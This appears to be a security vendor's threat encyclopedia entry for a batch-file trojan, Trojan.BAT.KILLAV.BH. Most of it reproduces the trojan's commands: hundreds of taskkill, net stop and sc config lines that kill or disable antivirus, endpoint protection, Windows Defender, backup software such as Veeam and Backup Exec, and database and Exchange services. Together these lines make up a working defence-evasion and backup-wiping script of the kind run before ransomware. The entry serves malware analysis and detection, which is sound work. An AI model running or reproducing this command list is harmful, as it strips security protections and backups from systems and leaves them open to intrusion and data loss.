Trojan.BAT.KILLAV.BH

April 15, 2020

Analysis by: Jemimah Mae Molina

ALIASES:

BAT/KillAV.NAU trojan (NOD32)

PLATFORM:

Windows

OVERALL RISK RATING:

DAMAGE POTENTIAL:

DISTRIBUTION POTENTIAL:

REPORTED INFECTION:

INFORMATION EXPOSURE:

Threat Type: Trojan
Destructiveness: No
Encrypted:
In the wild: Yes

OVERVIEW

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

TECHNICAL DETAILS

File Size: 47,930 bytes

File Type: BAT

Initial Samples Received Date: 13 Apr 2020

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following processes:

net stop MSSQL$SHAREPOINT /y
taskkill /im savfmseui.exe /f
sc config VeeamEnterpriseManagerSvc start= disabled
taskkill /im vsstat.exe /f
net stop vmware-converter-server /y
taskkill /im usrprmpt.exe /f
taskkill /im nrmenctb.exe /f
sc config SQLAgent$BKUPEXEC start= disabled
taskkill /im gzserv.exe /f
taskkill /im pccntmon.exe /f
sc config VeeamTransportSvc start= disabled
taskkill /im dlservice.exe /f
taskkill /im defwatch.exe /f
taskkill /im bdsubmit.exe /f
taskkill /im omtsreco.exe /f
net stop CSAuth /y
net stop Net2ClientSvc /y
net stop MSExchangeSRS /y
taskkill /im websensecontrolservice.exe /f
taskkill /im smsesrv.exe /f
taskkill /im euqmonitor.exe /f
taskkill /im clamtray.exe /f
taskkill /im bmrt.exe /f
taskkill /im mantispm.exe /f
sc config ReportServer$TPSAMA start= disabled
taskkill /im synctime.exe /f
taskkill /im ctdataload.exe /f
taskkill /im administrator.exe /f
sc config SSISTELEMETRY130 start= disabled
net stop IMAP4Svc /y
taskkill /im smex_remoteconf /f
taskkill /im upschd.exe /f
taskkill /im eeyeevnt.exe /f
sc config SntpService start= disabled
taskkill /im wrspysetup.exe /f
net stop ProLiantMonitor /y
taskkill /im ewidoctrl.exe /f
taskkill /im csfalconservice.exe /f
echo 1
taskkill /im isafinst.exe /f
taskkill /im avmcdlg.exe /f
taskkill /im drwupgrade.exe /f
sc config "SQLsafe Filter Service" start= disabled
taskkill /im pxemtftp.exe /f
taskkill /im kvmonxp.kxp /f
net stop gupdatem /y
taskkill /im epmd.exe /f
sc config ose start= disabled
taskkill /im mrf.exe /f
taskkill /im proficy administrator.exe /f
taskkill /im seestat.exe /f
net stop SepMasterService /y
sc config BrokerInfrastructurestart= disabled
net stop SQLTELEMETRY$ECWDB2 /y
sc config MBAMService start= disabled
taskkill /im nsmdemf.exe /f
taskkill /im schupd.exe /f
sc config MSSQL$VEEAMSQL2008R2 start= disabled
taskkill /im appsvc32.exe /f
taskkill /im fspc.exe /f
taskkill /im udaterui.exe /f
net stop EsgShKernel /y
net stop myAgtSvc /y
taskkill /im safeservice.exe /f
net stop SnowInventoryClient /y
sc config ccSetMgr start= disabled
sc config sysdown start= disabled
taskkill /im pccguide.exe /f
taskkill /im symsport.exe /f
sc config MSSQL$TPS start= disabled
taskkill /im fcappdb.exe /f
taskkill /im tmas.exe /f
taskkill /im avfwsvc.exe /f
taskkill /im pccntupd.exe /f
net stop SQLTELEMETRY /y
taskkill /im zlh.exe /f
taskkill /im lucoms.exe /f
taskkill /im nvcsched.exe /f
sc config SQLSERVERAGENT start= disabled
net stop SQLTELEMETRY$ITRIS /y
sc config MSSQL$ECWDB2 start= disabled
net stop EraserSvc11710 /y
taskkill /im server_eventlog.exe /f
taskkill /im infopath.exe /f
taskkill /im collwrap.exe /f
taskkill /im ccsetmgr.exe /f
taskkill /im a2service.exe /f
taskkill /im navshcom.exe /f
taskkill /im bwgo0000 /f
sc config WinVNC4 start= disabled
taskkill /im uplive.exe /f
taskkill /im gcascleaner.exe /f
taskkill /im nexe /f
sc config ARSM start= disabled
taskkill /im mpsevh.exe /f
sc config IBMDataServerMgr start= disabled
taskkill /im scanexplicit.exe /f
taskkill /im nip.exe /f
taskkill /im nipsvc.exe /f
taskkill /im vmware-converter.exe /f
taskkill /im tfun.exe /f
taskkill /im winword.exe /f
taskkill /im updaterui.exe /f
net stop SQLAgent$PROD /y
sc config MsDtsServer start= disabled
taskkill /im pavsched.exe /f
taskkill /im nlsvc.exe /f
taskkill /im msmdsrv.exe /f
net stop SQLAgent$SQL_2008 /y
taskkill /im ccevtmgr.exe /f
taskkill /im iswmgr.exe /f
sc config ccEvtMgr start= disabled
taskkill /im log_qtine.exe /f
sc config DB2 start= disabled
taskkill /im cslog.exe /f
taskkill /im gcasswupdater.exe /f
taskkill /im savscan.exe /f
taskkill /im srvload.exe /f
taskkill /im scan32.exe /f
taskkill /im sidebar.exe /f
sc config MSSQL$BKUPEXEC start= disabled
sc config VeeamMountSvc start= disabled
sc config TPVCGateway start= disabled
net stop Telemetryserver /y
net stop SQLAgent$SYSTEM_BGC /y
taskkill /im vmware-converter-a.exe /f
sc config CSLog start= disabled
taskkill /im fsguiexe.exe /f
taskkill /im pview.exe /f
taskkill /im tnslsnr.exe /f
taskkill /im ashserv.exe /f
sc config TmCCSF start= disabled
sc config MSSQL$SQL_2008 start= disabled
net stop SQLAgent$SBSMONITORING /y
taskkill /im casc.exe /f
sc config msvsmon90 start= disabled
taskkill /im reportsvc.exe /f
taskkill /im monitoringhost.exe /f
taskkill /im scfmanager.exe /f
taskkill /im klwtblfs.exe /f
sc config ReportServer$SYSTEM_BGC start= disabled
taskkill /im mpfconsole.exe /f
taskkill /im msscli.exe /f
taskkill /im poproxy.exe /f
net stop GoogleChromeElevationService /y
taskkill /im cmdinstall.exe /f
taskkill /im ccsmagtd.exe /f
taskkill /im rtvscan.exe /f
net stop klnagent /y
taskkill /im mcregwiz.exe /f
net stop "Zoolz 2 Service" /y
net stop LogProcessorService /y
taskkill /im kvxp.kxp /f
net stop SQLAgent$SQLEXPRESS /y
taskkill /im winlog.exe /f
taskkill /im zlclient.exe /f
taskkill /im ndetect.exe /f
taskkill /im teamviewer_service.exe /f
sc config EPProtectedService start= disable
taskkill /im egui.exe /f
taskkill /im prgateway.exe /f
taskkill /im avsynmgr.exe /f
net stop odserv /y
taskkill /im patch.exe /f
net stop wbengine /y
taskkill /im a2start.exe /f
taskkill /im slee81.exe /f
sc config DCAgent start= disabled
sc config "Veeam Backup Catalog Data Service" start= disabled
net stop mfewc /y
taskkill /im auth8021x.exe /f
net stop MySQL57 /y
taskkill /im dbsrv9.exe /f
taskkill /im pccpfw.exe /f
taskkill /im netcfg.exe /f
taskkill /im alsvc.exe /f
net stop Eventlog /y
sc config ekrn start= disabled
sc config EPSecurityServicestart= disabled
taskkill /im mcdash.exe /f
taskkill /im isafe.exe /f
taskkill /im updtnv28.exe /f
taskkill /im spntsvc.exe /f
taskkill /im patrolagent.exe /f
taskkill /im csmon.exe /f
taskkill /im mydesktopservice.exe /f
taskkill /im tfgui.exe /f
sc config mfevtp start= disabled
taskkill /im aphost.exe /f
taskkill /im mcvsshld.exe /f
taskkill /im kaccore.exe /f
taskkill /im managementagentnt.exe /f
taskkill /im uiwatchdog.exe /f
taskkill /im prrds.exe /f
taskkill /im mcshield.exe /f
taskkill /im taskhostw.exe /f
sc config "Acronis VSS Provider" start= disabled
sc config SQLAgent$SQLEXPRESS start= disabled
sc config IISAdmin start= disabled
taskkill /im pcscm.exe /f
taskkill /im v3exec.exe /f
taskkill /im ntcaservice.exe /f
taskkill /im monsvcnt.exe /f
taskkill /im forcefield.exe /f
taskkill /im rulaunch.exe /f
sc config tpautoconnsvc start= disabled
sc config BackupExecJobEngine start= disabled
sc config EsgShKernel start= disabled
taskkill /im dolphincharge.exe /f
taskkill /im tmpfw.exe /f
taskkill /im acctmgr.exe /f
taskkill /im mcwcecfg.exe /f
taskkill /im rapuisvc.exe /f
net stop BackupExecVSSProvider /y
taskkill /im mcconsol.exe /f
taskkill /im cpf.exe /f
taskkill /im fsgk32.exe /f
taskkill /im wrctrl.exe /f
taskkill /im siteadv.exe /f
taskkill /im sqlservr.exe /f
net stop VMwareCAFManagementAgentHost /y
taskkill /im pavreport.exe /f
sc config MSSQL$VEEAMSQL2012 start= disabled
taskkill /im mspmspsv.exe /f
taskkill /im rscd.exe /f
taskkill /im fsav32.exe /f
taskkill /im savservice.exe /f
taskkill /im ekrn.exe /f
taskkill /im csadmin.exe /f
taskkill /im prevsrv.exe /f
net stop EPSecurityService /y
taskkill /im rscdsvc.exe /f
taskkill /im frameworkservic /f
taskkill /im etcorrel.exe /f
taskkill /im ashpopwz.exe /f
sc config HealthService start= disabled
taskkill /im tmproxy.exe /f
net stop MsDtsServer /y
net stop IISAdmin /y
taskkill /im pavsrv50.exe /f
taskkill /im caantispyware.exe /f
taskkill /im vshwin32.exe /f
taskkill /im ravservice.exe /f
taskkill /im zoolz.exe /f
taskkill /im mfewc.exe /f
net stop VMware /y
taskkill /im oracle.exe /f
taskkill /im savfmsetask.exe /f
sc config SQLAgent$PROFXENGAGEMENT start= disabled
taskkill /im msksrvr.exe /f
taskkill /im pasystemtray.exe /f
sc config MSSQLServerADHelper100 start= disabled
net stop MSSQL$CITRIX_METAFRAME /y
sc config EPIntegrationService start= disable
net stop ntrtscan /y
taskkill /im spidernt.exe /f
sc config vmware-converter-server start= disabled
sc config SQLAgent$PRACTTICEMGT start= disabled
taskkill /im pavjobs.exe /f
net stop SQLAgent$ECWDB2 /y
net stop MSExchangeSA /y
sc config MSSQLFDLauncher$TPSAMA start= disabled
taskkill /im sysdoc32.exe /f
sc config MSSQL$ITRIS start= disabled
taskkill /im kpfwsvc.exe /f
taskkill /im mspub.exe /f
sc config CSDbSync start= disabled
taskkill /im ucservice.exe /f
taskkill /im sndsrvc.exe /f
taskkill /im csradius.exe /f
taskkill /im evtmgr.exe /f
taskkill /im premailengine.exe /f
taskkill /im fwcfg.exe /f
taskkill /im crdm.exe /f
taskkill /im steam.exe /f
sc config SQLAgent$VEEAMSQL2012 start= disabled
taskkill /im omslogmanager.exe /f
taskkill /im pcscan.exe /f
taskkill /im calogdump.exe /f
sc config mfewc start= disabled
net stop MSSQLFDLauncher$SQL_2008 /y
taskkill /im ndrvs.exe /f
net stop "SQLsafe Filter Service" /y
taskkill /im autoup.exe /f
taskkill /im inort.exe /f
taskkill /im esecagntservice.exe /f
taskkill /im ravtask.exe /f
sc config MSSQL$PRACTTICEBGC start= disabled
taskkill /im aswdisp.exe /f
taskkill /im mcsacore.exe /f
taskkill /im csacontrol.exe /f
taskkill /im dwrcst.exe /f
net stop ERSvc /y
taskkill /im client.exe /f
net stop TrueKeyServiceHelper /y
taskkill /im traptrackermgr.exe /f
taskkill /im symlcsvc.exe /f
taskkill /im ashwebsv.exe /f
net stop Alerter /y
taskkill /im mcupdate.exe /f
taskkill /im oasclnt.exe /f
taskkill /im stopa.exe /f
taskkill /im ashlogv.exe /f
taskkill /im csinsmnt.exe /f
taskkill /im umxpol.exe /f
taskkill /im ahnsdsv.exe /f
taskkill /im spbbcsvc.exe /f
taskkill /im webscanx.exe /f
sc config BackupExecRPCService start= disabled
taskkill /im bdlite.exe /f
taskkill /im mpfsrv.exe /f
taskkill /im njeeves.exe /f
net stop bedbg /y
taskkill /im rcsvcmon.exe /f
taskkill /im mpsvc.exe /f
sc config bedbg start= disabled
net stop MSExchangeMTA /y
net stop VeeamBackupSvc /y
taskkill /im psuaservice.exe /f
taskkill /im v3lite.exe /f
taskkill /im cdm.exe /f
sc config MSSQLFDLauncher start= disabled
net stop BackupExecRPCService /y
taskkill /im retinaengine.exe /f
taskkill /im csinject.exe /f
taskkill /im upfile.exe /f
net stop bcrservice /y
taskkill /im xcommsvr.exe /f
taskkill /im gcasserv.exe /f
net stop MsDtsServer130 /y
taskkill /im kvmonxp_2.kxp /f
taskkill /im nymse.exe /f
taskkill /im ccenter.exe /f
taskkill /im ncdaemon.exe /f
net stop SQLAgent$SHAREPOINT /y
taskkill /im gfireporterservice.exe /f
taskkill /im win32sysinfo.exe /f
taskkill /im smex_systemwatc /f
taskkill /im hwapi.exe /f
sc config sacsvr start= disabled
taskkill /im adminserver.exe /f
sc config klnagent start= disabled
net stop mfevtp /y
taskkill /im ppctlpriv.exe /f
taskkill /im tmntsrv.exe /f
taskkill /im navw32.exe /f
taskkill /im avscc.exe /f
taskkill /im alupdate.exe /f
taskkill /im erlsrv.exe /f
taskkill /im server_runtime.exe /f
net stop MSOLAP$TPS /y
net stop AcronisAgent /y
net stop EPUpdateService /y
taskkill /im setloadorder.exe /f
taskkill /im drweb386.exe /f
net stop svcGenericHost /y
taskkill /im url_response.exe /f
taskkill /im mfefire.exe /f
taskkill /im luall.exe /f
sc config WRSVC start= disabled
taskkill /im rfwstub.exe /f
net stop WinVNC4 /y
taskkill /im smex_activeupda /f
taskkill /im pqv2isvc.exe /f
net stop MSSQLFDLauncher$ITRIS /y
taskkill /im pmon.exe /f
sc config DB2GOVERNOR_DB2COPY1 start= disabled
taskkill /im mydesktopqos.exe /f
sc config WebClient start= disabled
taskkill /im basfipm.exe /f
taskkill /im acaegmgr.exe /f
taskkill /im pviewer.exe /f
taskkill /im rssensor.exe /f
taskkill /im tdimon.exe /f
net stop EPIntegrationService /y
net stop DB2INST2 /y
net stop MSSQLFDLauncher /y
taskkill /im cpd.exe /f
taskkill /im drwebmng.exe /f
taskkill /im swi_service.exe /f
sc config TPAutoConnSvc start= disabled
taskkill /im zavcore.exe /f
taskkill /im swserver.exe /f
taskkill /im ispwdsvc.exe /f
sc config MBEndpointAgent start= disabled
taskkill /im pavsrv52.exe /f
taskkill /im monsysnt.exe /f
taskkill /im fsma32.exe /f
taskkill /im msascui.exe /f
taskkill /im shstat.exe /f
sc config RSCDsvc start= disabled
sc config SQLAgent$SBSMONITORING start= disabled
taskkill /im esmagent.exe /f
taskkill /im mfeann.exe /f
taskkill /im cfsmsmd.exe /f
sc config SNAC start= disabled
sc config VeeamBrokerSvc start= disabled
sc config FA_Scheduler start= disabled
net stop swi_service /y
taskkill /im rfwsrv.exe /f
taskkill /im fpavserver.exe /f
sc config avbackup start= disabled
taskkill /im alert.exe /f
taskkill /im sav32cli.exe /f
net stop SQLAgent$VEEAMSQL2008R2 /y
taskkill /im healthservice.exe /f
taskkill /im psh_svc.exe /f
taskkill /im mghtml.exe /f
taskkill /im itmrtsvc.exe /f
taskkill /im dbsnmp.exe /f
taskkill /im mcsvhost.exe /f
taskkill /im aesecurityservice.exe /f
sc config mozyprobackup start= disabled
net stop TmCCSF /y
taskkill /im ravmond.exe /f
taskkill /im pavsrv51.exe /f
taskkill /im fsmb32.exe /f
net stop CSMon /y
taskkill /im avmailc.exe /f
taskkill /im inotask.exe /f
sc config MSSQL$CITRIX_METAFRAME start= disabled
taskkill /im aswregsvr.exe /f
taskkill /im vgauthservice.exe /f
taskkill /im ccapp.exe /f
taskkill /im v3sp.exe /f
taskkill /im toolbarupdater.exe /f
taskkill /im csdbsync.exe /f
taskkill /im proutil.exe /f
taskkill /im bluestripecollector.exe /f
net stop BackupExecAgentAccelerator /y
net stop ekrn /y
taskkill /im cfp.exe /f
taskkill /im gdfirewalltray.exe /f
taskkill /im mcupdmgr.exe /f
sc config SMTPSvc start= disabled
taskkill /im avwebgrd.exe /f
net stop ShMonitor /y
taskkill /im navwnt.exe /f
net stop MSSQLFDLauncher$SBSMONITORING /y
taskkill /im ocautoupds.exe /f
taskkill /im spideragent.exe /f
taskkill /im seanalyzertool.exe /f
taskkill /im avserver.exe /f
net stop MSOLAP$SQL_2008 /y
taskkill /im evtprocessecfile.exe /f
net stop "SQL Backups" /y
taskkill /im frzstate2k.exe /f
net stop SQLAgent$PROFXENGAGEMENT /y
taskkill /im ntrtscan.exe /f
taskkill /im defwatch /f
net stop sysdown /y
taskkill /im mfemactl.exe /f
taskkill /im bka.exe /f
sc config SQLAgent$PRACTTICEBGC start= disabled
taskkill /im ntservices.exe /f
taskkill /im v2iconsole.exe /f
taskkill /im aexsvc.exe /f
sc config CSAdmin start= disabled
sc config SQLAgent$SQL_2008 start= disabled
net stop VeeamCatalogSvc /y
taskkill /im acaas.exe /f
taskkill /im tscutynt.exe /f
taskkill /im naprdmgr.exe /f
taskkill /im dsmcad.exe /f
net stop MSExchangeES /y
taskkill /im ilicensesvc.exe /f
taskkill /im drwebcom.exe /f
taskkill /im sweepsrv.sys /f
taskkill /im pcctlcom.exe /f
taskkill /im nailgpip.exe /f
taskkill /im webtrapnt.exe /f
taskkill /im ntcaagent.exe /f
taskkill /im usergate.exe /f
taskkill /im svcntaux.exe /f
taskkill /im ofcdog.exe /f
sc config CSRadius start= disabled
taskkill /im capfaem.exe /f
taskkill /im ashsimpl.exe /f
sc config MSSQL$PROFXENGAGEMENT start= disabled
net stop sacsvr /y
sc config MSSQLLaunchpad$ITRIS start= disabled
sc config OracleClientCache80 start= disabled
taskkill /im livesrv.exe /f
net stop DB2MGMTSVC_DB2COPY1 /y
net stop SmcService /y
taskkill /im pavkre.exe /f
taskkill /im msaccess.exe /f
taskkill /im zapro.exe /f
net stop MSExchangeIS /y
taskkill /im firefox.exe /f
taskkill /im nvcoas.exe /f
net stop WinDefend /y
taskkill /im sbamsvc.exe /f
taskkill /im kansvr.exe /f
taskkill /im bhipssvc.exe /f
taskkill /im knupdatemain.exe /f
taskkill /im avkservice.exe /f
taskkill /im etwcontrolpanel.exe /f
taskkill /im hdb.exe /f
net stop MSSQLFDLauncher$SYSTEM_BGC /y
taskkill /im mpf.exe /f
sc config MSSQLFDLauncher$SYSTEM_BGC start= disabled
taskkill /im pagent.exe /f
taskkill /im pmgreader.exe /f
sc config aswBcc start= disabled
taskkill /im ssscheduler.exe /f
taskkill /im cis.exe /f
taskkill /im reportersvc.exe /f
net stop SDD_Service /y
taskkill /im pskmssvc.exe /f
taskkill /im tclproc.exe /f
sc config SQLTELEMETRY$ITRIS start= disabled
net stop MSSQL$PRACTICEMGT /y
taskkill /im ppmcativedetection.exe /f
sc config "Symantec System Recovery" start= disabled
taskkill /im sschk.exe /f
taskkill /im trjscan.exe /f
net stop "Symantec System Recovery" /y
taskkill /im rsnetsvr.exe /f
taskkill /im avengine.exe /f
sc config VeeamDeploySvc start= disabled
taskkill /im prrouter.exe /f
sc config LogProcessorService start= disabled
sc config VeeamCloudSvc start= disabled
taskkill /im fsavgui.exe /f
sc config MSSQLServerOLAPService start= disabled
sc config RESvc start= disabled
taskkill /im mcpalmcfg.exe /f
sc config VMTools start= disabled
taskkill /im clshield.exe /f
taskkill /im aclntusr.exe /f
net stop "SQLsafe Backup Service" /y
sc config ESHASRV start= disabled
taskkill /im avesvc.exe /f
taskkill /im emlproui.exe /f
taskkill /im vprot.exe /f
taskkill /im isuac.exe /f
net stop CSRadius /y
taskkill /im umxagent.exe /f
taskkill /im fshdll32.exe /f
taskkill /im mcshell.exe /f
taskkill /im visio.exe /f
sc config SDRSVC start= disabled
sc config MSSQLFDLauncher$SQL_2008 start= disabled
taskkill /im smsesp.exe /f
taskkill /im mcshld9x.exe /f
sc config DB2MGMTSVC_DB2COPY1 start= disabled
net stop MSSQL$ITRIS /y
sc config MSMQ start= disabled
sc config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
taskkill /im cfplogvw.exe /f
taskkill /im lucallbackproxy.exe /f
taskkill /im googlecrashhandler.exe /f
taskkill /im ofcpfwsvc.exe /f
taskkill /im avcenter.exe /f
taskkill /im swnxt.exe /f
sc config DB2INST2 start= disabled
taskkill /im sqlbrowser.exe /f
taskkill /im pqibrowser.exe /f
taskkill /im winroute.exe /f
taskkill /im msftesql.exe /f
taskkill /im pep.exe /f
taskkill /im dwwin.exe /f
net stop MSSQL$ECWDB2 /y
taskkill /im eventparser.exe /f
taskkill /im rapapp.exe /f
taskkill /im caf.exe /f
taskkill /im kvolself.exe /f
taskkill /im ccsvchst.exe /f
taskkill /im cssauth.exe /f
sc config MSSQLFDLauncher$SHAREPOINT start= disabled
taskkill /im sqlwriter.exe /f
taskkill /im diskmon.exe /f
taskkill /im casecuritycenter.exe /f
taskkill /im fcsms.exe /f
taskkill /im etloganalyzer.exe /f
net stop RESvc /y
taskkill /im wssfcmai.exe /f
taskkill /im inet_gethost.exe /f
taskkill /im svdealer.exe /f
taskkill /im djsnetcn.exe /f
net stop BackupExecAgentBrowser /y
sc config MSSQL$PRACTICEMGT start= disabled
taskkill /im mfecanary.exe /f
sc config "Zoolz 2 Service" start= disabled
sc config CSAuth start= disabled
sc config TmPfw start= disable
taskkill /im avscan.exe /f
sc config EPSecurityService start= disabled
taskkill /im ccupdate.exe /f
taskkill /im drweb32w.exe /f
net stop epredline /y
sc config MSSQL$PROD start= disabled
taskkill /im deteqt.agent.exe /f
taskkill /im prstubber.exe /f
taskkill /im sdtrayapp.exe /f
sc config gupdate start= disabled
taskkill /im dltray.exe /f
taskkill /im vrv.exe /f
taskkill /im drweb.exe /f
taskkill /im inonmsrv.exe /f
taskkill /im snac.exe /f
taskkill /im onenote.exe /f
taskkill /im psuamain.exe /f
sc config Cissesrv start= disabled
taskkill /im vrvmon.exe /f
taskkill /im mgntsvc.exe /f
taskkill /im emlproxy.exe /f
taskkill /im paamsrv.exe /f
taskkill /im sysoptenginesvc.exe /f
net stop NetSvc /y
taskkill /im ccflic4.exe /f
taskkill /im ashchest.exe /f
taskkill /im afwserv.exe /f
net stop LRSDRVX /y
net stop ReportServer$TPS /y
net stop SQLAgent$NET2 /y
taskkill /im psimsvc.exe /f
taskkill /im dwarkdaemon.exe /f
taskkill /im avkproxy.exe /f
sc config ERSvc start= disabled
taskkill /im mcods.exe /f
taskkill /im ghost_2.exe /f
net stop msvsmon90 /y
taskkill /im avktray.exe /f
sc config EPUpdateServicestart= disabled
taskkill /im clamscan.exe /f
sc config VeeamDeploymentService start= disabled
net stop aswBcc /y
net stop mozyprobackup /y
taskkill /im control_panel.exe /f
taskkill /im stopp.exe /f
sc config swi_filter start= disabled
sc config MSSQL$NET2 start= disabled
sc config ReportServer$TPS start= disabled
taskkill /im tsansrf.exe /f
sc config System start= disabled
taskkill /im scanmsg.exe /f
taskkill /im tpsrv.exe /f
taskkill /im asupport.exe /f
net stop MSSQL$VEEAMSQL2012 /y
net stop ReportServer /y
taskkill /im issdaemon.exe /f
taskkill /im scftray.exe /f
net stop tmlisten /y
taskkill /im pctstray.exe /f
taskkill /im unsecapp.exe /f
net stop WRSVC /y
taskkill /im mysqld.exe /f
taskkill /im snhwsrv.exe /f
taskkill /im caissdt.exe /f
net stop VeeamTransportSvc /y
taskkill /im pcsws.exe /f
sc config SepMasterServiceMig start= disabled
taskkill /im vpc32.exe /f
sc config SepMasterService start= disabled
net stop VeeamDeploymentService /y
taskkill /im vstskmgr.exe /f
taskkill /im aawservice.exe /f
taskkill /im spyemergency.exe /f
taskkill /im scanfrm.exe /f
sc config EraserSvc11710 start= disabled
net stop RSCDsvc /y
taskkill /im onlinent.exe /f
sc config BackupExecManagementService start= disabled
net stop WebClient /y
taskkill /im pavbckpt.exe /f
net stop SQLAgent$EPOSERVER /y
taskkill /im ghosttray.exe /f
taskkill /im capmuamagt.exe /f
taskkill /im olfsnt40.exe /f
taskkill /im navelog.exe /f
taskkill /im regmech.exe /f
taskkill /im smseui.exe /f
taskkill /im seccenter.exe /f
net stop BackupExecManagementService /y
taskkill /im tsmpnt.exe /f
taskkill /im certificateprovider.exe /f
taskkill /im lmon.exe /f
sc config TlntSvr start= disabled
taskkill /im bdss.exe /f
net stop HealthService /y
taskkill /im mskagent.exe /f
net stop VeeamDeploySvc /y
taskkill /im ravxp.exe /f
sc config AdobeARMservice start= disabled
taskkill /im vettray.exe /f
taskkill /im symproxysvc.exe /f
sc config DB2-0 start= disabled
taskkill /im pralarmmgr.exe /f
taskkill /im era.exe /f
net stop CSAdmin /y
net stop NetMsmqActivator /y
sc config MsDtsServer100 start= disabled
taskkill /im kvdetech.exe /f
sc config WinDefend start= disabled
taskkill /im starta.exe /f
taskkill /im sqlagent.exe /f
sc config bcrservice start= disabled
taskkill /im acais.exe /f
sc config MSExchangeSA start= disabled
sc config MSExchangeIS start= disabled
net stop MSSQLServerOLAPService /y
taskkill /im npssvc.exe /f
net stop BlueStripeCollector /y
taskkill /im pctssvc.exe /f
taskkill /im bdmcon.exe /f
taskkill /im prwriter.exe /f
taskkill /im mcappins.exe /f
taskkill /im etreporter.exe /f
sc config MMS start= disabled
sc config MSSQLSERVER start= disabled
net stop macmnsvc /y
taskkill /im deloeminfs.exe /f
taskkill /im up2date.exe /f
taskkill /im npmdagent.exe /f
taskkill /im savui.exe /f
taskkill /im npfmntor.exe /f
sc config VeeamHvIntegrationSvc start= disabled
taskkill /im nerosvc.exe /f
taskkill /im console.exe /f
taskkill /im mcproxy.exe /f
taskkill /im mcui32.exe /f
sc config DB2LICD_DB2COPY1 start= disabled
taskkill /im psanhost.exe /f
taskkill /im useractivity.exe /f
taskkill /im mfehcs.exe /f
taskkill /im pccnt.exe /f
taskkill /im nisum.exe /f
taskkill /im ahnsd.exe /f
net stop DB2-0 /y
taskkill /im savfmsesrv.exe /f
net stop CSDbSync /y
taskkill /im ehttpsrv.exe /f
taskkill /im blupro.exe /f
taskkill /im schdsrvc.exe /f
taskkill /im bcrservice.exe /f
sc config EPUpdateService start= disable
sc config IDriverT start= disabled
net stop SQLAgent$CITRIX_METAFRAME /y
taskkill /im bdredline.exe /f
taskkill /im aexswdusr.exe /f
taskkill /im loggetor.exe /f
taskkill /im fchelper64.exe /f
taskkill /im fshoster64.exe /f
sc config BackupExecAgentAccelerator start= disabled
taskkill /im dao_log.exe /f
taskkill /im nprotect.exe /f
taskkill /im aswserv.exe /f
sc config CSMon start= disabled
taskkill /im pcclient.exe /f
taskkill /im vsserv.exe /f
net stop MSSQL$NET2 /y
sc config IBMDSServer41 start= disabled
sc config SQLTELEMETRY$ECWDB2 start= disabled
taskkill /im pntiomon.exe /f
taskkill /im npscheck.exe /f
taskkill /im sndmon.exe /f
taskkill /im mctskshd.exe /f
net stop SentinelAgent /y
net stop DB2REMOTECMD_DB2COPY1 /y
sc config Telemetryserver start= disabled
taskkill /im cistray.exe /f
taskkill /im frameworkservic.exe /f
net stop SQLSERVERAGENT /y
taskkill /im ashupd.exe /f
taskkill /im ccm messaging.exe /f
taskkill /im mcvsrte.exe /f
taskkill /im spooler.exe /f
net stop EhttpSrv /y
taskkill /im kansgui.exe /f
net stop AcrSch2Svc /y
taskkill /im psctrls.exe /f
sc config ImapiService start= disabled
net stop SNAC /y
sc config WdNisSvc start= disabled
taskkill /im ashenhcd.exe /f
sc config MSSQLFDLauncher$ITRIS start= disabled
net stop swi_update /y
taskkill /im sqbcoreservice.exe /f
taskkill /im pnmsrv.exe /f
taskkill /im swdsvc.exe /f
taskkill /im ahnrpt.exe /f
taskkill /im nsmdmon.exe /f
taskkill /im issvc.exe /f
taskkill /im paxton.net2.commsserverservice.exe /f
net stop MSMQ /y
taskkill /im mcepocfg.exe /f
taskkill /im mscifapp.exe /f
sc config SQLAgent$SYSTEM_BGC start= disabled
net stop "Veeam Backup Catalog Data Service" /y
taskkill /im agntsvc.exe /f
net stop TrueKeyScheduler /y
taskkill /im symwsc.exe /f
taskkill /im caunst.exe /f
taskkill /im igateway.exe /f
taskkill /im lucomserver.exe /f
sc config NetMsmqActivator start= disabled
sc config SQLTELEMETRY start= disabled
sc config "Enterprise Client Service" start= disabled
taskkill /im nissrv.exe /f
taskkill /im kissvc.exe /f
taskkill /im ccprovsp.exe /f
taskkill /im mcinfo.exe /f
sc config VeeamNFSSvc start= disabled
net stop MSSQLFDLauncher$TPS /y
net stop MSSQL$BKUPEXEC /y
taskkill /im savfmsesjm.exe /f
net stop CSLog /y
taskkill /im kpf4gui.exe /f
taskkill /im ras.exe /f
net stop SQLAgent$ITRIS /y
taskkill /im myagttry.exe /f
taskkill /im remupd.exe /f
taskkill /im etscheduler.exe /f
sc config "SQLsafe Backup Service" start= disabled
taskkill /im kwatch.exe /f
taskkill /im etrssfeeds.exe /f
taskkill /im nsmdsch.exe /f
taskkill /im ccsystemreport.exe /f
taskkill /im macmnsvc.exe /f
taskkill /im knownsvr.exe /f
net stop MSSQLLaunchpad$ITRIS /y
taskkill /im mgavrtcl.exe /f
net stop BrokerInfrastructure /y
taskkill /im inorpc.exe /f
taskkill /im umxfwhlp.exe /f
taskkill /im edisk.exe /f
taskkill /im iface.exe /f
taskkill /im mpfservice.exe /f
taskkill /im tmlisten.exe /f
taskkill /im neotrace.exe /f
taskkill /im drwagntd.exe /f
taskkill /im urllstck.exe /f
taskkill /im mcwce.exe /f
sc config macmnsvc start= disabled
taskkill /im tnbutil.exe /f
taskkill /im cstacacs.exe /f
taskkill /im mfemms.exe /f
sc config DB2REMOTECMD_DB2COPY1 start= disabled
taskkill /im ixfwsvc.exe /f
taskkill /im mcagent.exe /f
sc config SQLAgent$CXDB start= disabled
taskkill /im avtask.exe /f
taskkill /im uiseagnt.exe /f
taskkill /im cappactiveprotection.exe /f
taskkill /im fsguidll.exe /f
net stop MSSQL$SQL_2008 /y
taskkill /im klnacserver.exe /f
sc config Symantec start= disabled
taskkill /im kswebshield.exe /f
net stop SQLAgent$VEEAMSQL2012 /y
taskkill /im prproficymgr.exe /f
taskkill /im fws.exe /f
taskkill /im nisserv.exe /f
sc config NtmsSvc start= disabled
net stop VeeamHvIntegrationSvc /y
taskkill /im crashrep.exe /f
sc config SentinelStaticEngine start= disabled
sc config MSSQL$SBSMONITORING start= disabled
taskkill /im ashskpck.exe /f
sc config BackupExecVSSProvider start= disabled
taskkill /im ssp.exe /f
taskkill /im prunsrv.exe /f
taskkill /im ocssd.exe /f
taskkill /im gdscan.exe /f
net stop MsDtsServer100 /y
sc config SmcService start= disabled
net stop MSSQL$VEEAMSQL2008R2 /y
